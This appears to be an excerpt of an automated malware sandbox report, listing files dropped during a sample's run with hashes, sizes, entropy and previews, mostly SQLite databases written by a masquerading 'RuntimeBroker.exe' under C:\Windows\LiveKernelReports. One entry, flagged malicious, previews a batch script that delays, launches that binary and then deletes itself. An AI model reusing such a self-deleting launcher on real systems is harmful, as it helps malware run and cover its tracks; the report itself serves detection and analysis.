                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):225
                                                                                  Entropy (8bit):5.143791187184367
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:hCijTg3Nou1SV+DEj5zvIKOZG1N723feU9zK:HTg9uYDEj5jzaW9
                                                                                  MD5:2ECFC9071E254C5EDB6E20ECB0231D7E
                                                                                  SHA1:34E55FD199E5F9F9CCA8F0CDF298A98890D35A2D
                                                                                  SHA-256:BCFC207D70BB96A252599F407830E5ABC678E39C203FE489CE9010AE367D9493
                                                                                  SHA-512:23DCC82B63997A7CE888CF1A46EEF54BBF00C2DC7874F617D80B2D1D7BC1138B75D066AA7885B95E76ABDF2B94A2ACF10D464E25D5A7120E977CE1AD54E2EA59
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Windows\LiveKernelReports\RuntimeBroker.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\HArqwkOZhw.bat"
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
